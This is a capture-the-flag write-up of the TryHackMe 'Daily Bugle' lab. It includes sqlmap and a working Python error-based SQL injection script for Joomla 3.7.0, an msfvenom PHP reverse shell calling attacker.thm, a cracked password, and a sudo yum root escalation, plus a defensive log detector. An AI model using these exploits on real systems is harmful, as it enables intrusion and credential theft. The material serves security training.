TryHackMe writeup: Daily Bugle – The Daily Bugle is a fake news paper

  1. Procedure
  2. End matter
  3. References

Probing

Figure 1
┌──(dna@deniers)-[~/dailybugle]
└─$ sudo nmap -sT -A -v -Pn -p- -O -sC -oX tcp_scan.xml --max-scan-delay=5s -T4 dailybugle.thm
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at [redacted]
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating Connect Scan at 06:01
Scanning dailybugle.thm [65535 ports]

[… snip …]

 

┌──(dna@deniers)-[~]
└─$ gobuster dir -u http://dailybugle.thm -w ./directories.txt -x php,bak,htm,html -t 40 -k
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dailybugle.thm
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                ./directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,bak,htm
[+] Timeout:                 10s
===============================================================
[redacted] Starting gobuster in directory enumeration mode
===============================================================

[… snip …]

 

[... snip ...]

<base href="http://dailybugle.thm/" />
<meta name="description" content="New York City tabloid newspaper" />
<meta name="generator" content="Joomla! - Open Source Content Management" />
<title>Home</title>

[… snip …]

 

┌──(dna@deniers)-[~/dailybugle]
└─$ xsltproc tcp_scan.xml -o tcp_scan.html

┌──(dna@deniers)-[~/dailybugle]
└─$

 

Figure 2
[... snip ...]

/.htm (Status: 403) [Size: 206]
/images (Status: 301) [Size: 237] [--> http://dailybugle.thm/images/]
/index.php (Status: 200) [Size: 9286]
/.html (Status: 403) [Size: 207]
/media (Status: 301) [Size: 236] [--> http://dailybugle.thm/media/]
/templates (Status: 301) [Size: 240] [--> http://dailybugle.thm/templates/]
/modules (Status: 301) [Size: 238] [--> http://dailybugle.thm/modules/]
/bin (Status: 301) [Size: 234] [--> http://dailybugle.thm/bin/]
/plugins (Status: 301) [Size: 238] [--> http://dailybugle.thm/plugins/]
/includes (Status: 301) [Size: 239] [--> http://dailybugle.thm/includes/]
/language (Status: 301) [Size: 239] [--> http://dailybugle.thm/language/]
/components (Status: 301) [Size: 241] [--> http://dailybugle.thm/components/]
/cache (Status: 301) [Size: 236] [--> http://dailybugle.thm/cache/]
/libraries (Status: 301) [Size: 240] [--> http://dailybugle.thm/libraries/]
/tmp (Status: 301) [Size: 234] [--> http://dailybugle.thm/tmp/]
/layouts (Status: 301) [Size: 238] [--> http://dailybugle.thm/layouts/]
/administrator (Status: 301) [Size: 244] [--> http://dailybugle.thm/administrator/]
/configuration.php (Status: 200) [Size: 0]
/cli (Status: 301) [Size: 234] [--> http://dailybugle.thm/cli/]
/.html (Status: 403) [Size: 207]
/.htm (Status: 403) [Size: 206]
Progress: 515433 / 1038220 (49.65%)[ERROR] [redacted] [!] Get "http://dailybugle.thm/subrelated.bak": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] [redacted] [!] Get "http://dailybugle.thm/subrelated.htm": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] [redacted] [!] Get "http://dailybugle.thm/subtestimonials.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

[… snip …]

 

[... snip ...]

Processing http://dailybugle.thm …

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://dailybugle.thm/administrator/components
http://dailybugle.thm/administrator/modules
http://dailybugle.thm/administrator/templates
http://dailybugle.thm/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://dailybugle.thm/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dailybugle.thm/robots.txt

Interesting path found from robots.txt
http://dailybugle.thm/joomla/administrator/

[… snip …]

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

Your Report : reports/dailybugle.thm/

[… snip …]

 

http://dailybugle.thm/index.php/2-uncategorised/1-spider-man-robs-bank
http://dailybugle.thm/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml

Initial access: the SQL injection vulnerability

┌──(dna@deniers)-[~/dailybugle]
└─$ sqlmap -u "http://dailybugle.thm/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' --dump -v3

[… snip …]

[12:12:02] [DEBUG] cleaning up configuration parameters
[12:12:02] [DEBUG] setting the HTTP timeout
[12:12:02] [DEBUG] setting the HTTP User-Agent header
[12:12:02] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:12:02] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[12:12:02] [DEBUG] creating HTTP requests opener object
[12:12:03] [DEBUG] setting the HTTP Referer header to the target URL
[12:12:03] [DEBUG] setting the HTTP Host header to the target URL
[12:12:03] [DEBUG] resolving hostname 'dailybugle.thm'
[12:12:03] [INFO] testing connection to the target URL
[12:12:03] [DEBUG] declared web page charset 'utf-8'
[12:12:03] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[12:12:03] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('eaa83fe8b963ab08ce9ab7d4a798de05=sv4pts6c7sg...pen4oo6pt1'). Do you want to use those [Y/n]

[… snip …]

 

Table 1
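The injection that sqlmap is pointed at above, done by hand so the mechanism is visible. This is an added example, not code from the writeup or from sqlmap. Joomla 3.7.0 drops list[fullordering] into an ORDER BY clause without validating it (the com_fields flaw tracked as CVE-2017-8917; joomscan's "core is not vulnerable" verdict above is a false negative), so an updatexml() call whose XPath argument is a chosen SELECT makes MySQL echo that value inside its "XPATH syntax error" message. Two things the sqlmap line glosses over are handled here: the error carries at most 32 characters, so results are pulled out 31 bytes at a time behind a '~' marker, and '#__' is Joomla's table-prefix placeholder rather than a real table name, so the prefixed users table is resolved from information_schema first (sqlmap also needs that real name in -T, or --tables to list it). The host and path are the writeup's; FAKE_DB and fake_fetch are constructed stand-ins so the block runs offline, and http_fetch is the transport to swap in against a live target.

```python
"""
Manual error-based extraction through Joomla's com_fields list[fullordering]
parameter.  Added example; not from the writeup or from sqlmap.  Assumptions:
the target answers over plain HTTP, MySQL's updatexml() XPATH error text is
echoed in the 500 page, and FAKE_DB / fake_fetch are constructed stand-ins.
"""
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Optional

TARGET = "http://dailybugle.thm/index.php"   # URL from the writeup

# MySQL reports at most 32 characters of the bad XPath expression.  One of
# them is the '~' marker we prepend, so data comes out 31 bytes per request.
MARKER = "0x7e"        # '~' as a hex literal, so the payload needs no quotes
CHUNK = 31
ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_payload(subquery: str, offset: int = 1) -> str:
    """list[fullordering] value that leaks one window of a single-value SELECT."""
    window = f"MID(({subquery}),{offset},{CHUNK})"
    return f"updatexml(0x23,concat({MARKER},{window}),1)"


def build_url(payload: str) -> str:
    params = {"option": "com_fields", "view": "fields", "layout": "modal",
              "list[fullordering]": payload}
    return TARGET + "?" + urllib.parse.urlencode(params)


def parse_error(body: str) -> Optional[str]:
    """Pull the leaked window out of the (HTML-escaped) error page, or None."""
    m = ERROR_RE.search(html.unescape(body))
    return m.group(1) if m else None


def extract(subquery: str, fetch: Callable[[str], str]) -> str:
    """Walk the result of `subquery` 31 bytes at a time until a short window."""
    out, offset = [], 1
    while True:
        chunk = parse_error(fetch(build_url(build_payload(subquery, offset))))
        if chunk is None:
            raise RuntimeError("no XPATH error in response; injection not firing")
        out.append(chunk)
        if len(chunk) < CHUNK:
            return "".join(out)
        offset += CHUNK


def http_fetch(url: str) -> str:
    """Real transport: the HTTP 500 *is* the channel, so keep its body."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


# ---- constructed offline stand-in for the target (not real data) ----------
FAKE_DB = {
    # 0x255f7573657273 is '%_users': Joomla's '#__' prefix is a placeholder,
    # so the real table name has to be discovered before it can be dumped.
    "SELECT table_name FROM information_schema.tables "
    "WHERE table_name LIKE 0x255f7573657273 LIMIT 1": "xyz99_users",
    "SELECT CONCAT(username,0x3a,password) FROM xyz99_users LIMIT 1":
        "admin:$2y$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0",
}


def fake_fetch(url: str) -> str:
    """Answer like a Joomla 3.7.0 500 page would for the payload in `url`."""
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    m = re.search(r"MID\(\((.+)\),(\d+),(\d+)\)", qs["list[fullordering]"][0])
    value = FAKE_DB[m.group(1)]
    start, length = int(m.group(2)) - 1, int(m.group(3))
    shown = ("~" + value[start:start + length])[:32]   # MySQL's 32-char cap
    return f"<h1>Error</h1><p>1105 XPATH syntax error: &#039;{shown}&#039;</p>"


def demo(fetch: Callable[[str], str] = fake_fetch):
    table = extract("SELECT table_name FROM information_schema.tables "
                    "WHERE table_name LIKE 0x255f7573657273 LIMIT 1", fetch)
    creds = extract(f"SELECT CONCAT(username,0x3a,password) FROM {table} LIMIT 1", fetch)
    return table, creds


if __name__ == "__main__":
    print(demo())          # pass http_fetch to run it against a live target
```

The 66-character constructed username:hash pair needs three requests (31 + 31 + 4 bytes), and the loop stops on the first window shorter than 31, which also covers a value whose length is an exact multiple of 31 (the next window comes back empty).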

Initial access: password cracking

Figure 3
┌──(dna@deniers)-[~/dailybugle]
└─$ john joomla_hash --wordlist=./rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:38 0.02% 0g/s 76.68p/s 76.68c/s 76.68C/s raluca..maricar
0g 0:00:04:00 0.10% 0g/s 74.66p/s 74.66c/s 74.66C/s 121981..020891
spiderman123     (?)     <-- cracked password
1g 0:00:10:59 DONE 0.001517g/s 71.06p/s 71.06c/s 71.06C/s sweetsmile..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(dna@deniers)-[~/dailybugle]
└─$

 

Figure 4
Figure 5
┌──(dna@deniers)-[~/dailybugle]
└─$ sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.thm LPORT=4444 -f raw -o meterpreter.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
Saved as: meterpreter.php

[… snip …]

 

┌──(dna@deniers)-[~/dailybugle]
└─$ sudo msfconsole
[sudo] password for dna:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker.thm
LHOST => attacker.thm
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on attacker.thm:4444

[… snip …]

 

┌──(dna@deniers)-[~/dailybugle]
└─$ curl http://dailybugle.thm/templates/protostar/logging.php

[… snip …]

 

[*] Started reverse TCP handler on attacker.thm:4444 
[*] Sending stage (39927 bytes) to dailybugle.thm
[*] Meterpreter session 1 opened (attacker.thm:4444 -> dailybugle.thm:42632) at [redacted]

meterpreter >

 

meterpreter > pwd
/var/www/html/templates/protostar
meterpreter > cd ../..
meterpreter > pwd
/var/www/html
meterpreter > cat configuration.php
<?php
class JConfig {

[… snip …]

public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';

[… snip …]

public $shared_session = '0';
}meterpreter >

 

meterpreter > ls /home
Listing: /home
==============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040700/rwx—— 99 dir 2019-12-15 19:47:48 -0500 jjameson

meterpreter >

 

┌──(dna㉿deniers)-[~/dailybugle]
└─$ ssh jjameson@dailybugle.thm    
jjameson@dailybugle.thm's password: 
Last login: Mon Dec 16 05:14:55 2019 from netwars
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ ls
user.txt
[jjameson@dailybugle ~]$ cat user.txt
[redacted]
[jjameson@dailybugle ~]$

Post-exploitation

[jjameson@dailybugle ~]$ find / -type f -perm /4000 -print 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
[jjameson@dailybugle ~]$

 

[jjameson@dailybugle ~]$ find / -type f -name root.txt -print 2>/dev/null
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ 
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ 
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ 
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#
sh-4.2# cat /root/root.txt
[redacted]
sh-4.2#
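The defender's view of the yum trick above. This is an added example, not from the writeup: it parses sudo's syslog records (the default "user : TTY=... ; PWD=... ; USER=root ; COMMAND=..." shape written to /var/log/secure on CentOS) and flags root-level yum runs that point yum at a config file outside /etc, enable a plugin by name, or override the plugin paths, which is exactly what `sudo yum -c $TF/x --enableplugin=y` does. The log lines in SAMPLE_LOG are constructed for the demo, and the timestamps, TTY and temp path in them are made up. The real fix is removing the `(ALL) NOPASSWD: /usr/bin/yum` rule: yum loads Python plugins from whatever config it is handed, so it cannot be made safe to run as root on an unprivileged user's command line.

```python
"""
Detect the yum plugin-loading sudo abuse in sudo's syslog records.
Added example, not part of the writeup.  Assumes sudo's default log format
("user : TTY=... ; PWD=... ; USER=root ; COMMAND=...").  SAMPLE_LOG is constructed.
"""
import re
from typing import List, Optional

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;\s+"
    r"USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$"
)

# Constructed records: the abuse, a benign update, a --config= variant, and a
# denied command (sudo logs denials in a different shape, which is skipped).
SAMPLE_LOG = """\
Dec 16 05:20:01 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum -c /tmp/tmp.Kx1Q2z/x --enableplugin=y
Dec 16 05:21:13 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum update -y
Dec 16 05:22:40 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum --config=/home/jjameson/x.conf install vim
Dec 16 05:23:05 dailybugle sudo: jjameson : command not allowed ; TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/bin/ls /root
"""


def yum_findings(argv: List[str]) -> List[str]:
    """
    Why a yum argv looks like the plugin trick: a config file outside /etc
    (yum takes pluginpath/pluginconfpath from it), a plugin enabled by name,
    or plugin paths overridden with --setopt.  Empty list means nothing odd.
    """
    reasons = []
    i = 1
    while i < len(argv):
        key, has_eq, val = argv[i].partition("=")
        if key in ("-c", "--config", "--enableplugin", "--setopt") and not has_eq:
            i += 1                                   # value is the next token
            val = argv[i] if i < len(argv) else ""
        if key in ("-c", "--config") and not val.startswith("/etc/"):
            reasons.append(f"config outside /etc: {val}")
        elif key == "--enableplugin":
            reasons.append(f"plugin enabled on the command line: {val}")
        elif key == "--setopt" and val.split("=", 1)[0] in ("pluginpath", "pluginconfpath"):
            reasons.append(f"plugin path overridden: {val}")
        i += 1
    return reasons


def analyze_sudo_line(line: str) -> Optional[dict]:
    """A finding for a successful sudo run of yum with suspicious options, else None."""
    m = SUDO_RE.search(line)
    if not m:
        return None                                  # denial or non-sudo record
    argv = m.group("cmd").split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "yum":
        return None
    reasons = yum_findings(argv)
    if not reasons:
        return None
    return {"user": m.group("user"), "runas": m.group("runas"),
            "cmd": m.group("cmd"), "reasons": reasons}


def scan(log_text: str) -> List[dict]:
    """Findings for every line of a sudo log, in file order."""
    return [hit for hit in map(analyze_sudo_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['user']} -> {hit['runas']}: {hit['cmd']}")
        for reason in hit["reasons"]:
            print("   ", reason)
```

A lone --enableplugin is a weak signal on its own (administrators do enable packaged plugins that way); a config file under /tmp, /home or anywhere else outside /etc is the strong one, because that is where the attacker-controlled pluginpath comes from.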
End matter

  • Do not assume that the privileges gained at initial access match those of any other account on the box. Here the web shell ran as the Apache HTTP server's user: it could read configuration.php and list /home, but jjameson's home directory is mode 0700 and stayed out of reach until the separate SSH login, which worked because the Joomla database password from configuration.php was reused for jjameson's account.
  • Sometimes more probing is needed to reach other parts of the target system, not only the root account. In some cases root may not be reachable at all, and an offensive security engineer has to settle for whatever non-root access they can get.
  • Joomla!'s configuration.php holds the database credentials and other details about the target; add them to your "mind map." Furthermore, once an administrator login is in hand, Joomla!'s template manager writes arbitrary PHP into the web root, which is how the meterpreter stage came to live at templates/protostar/logging.php.
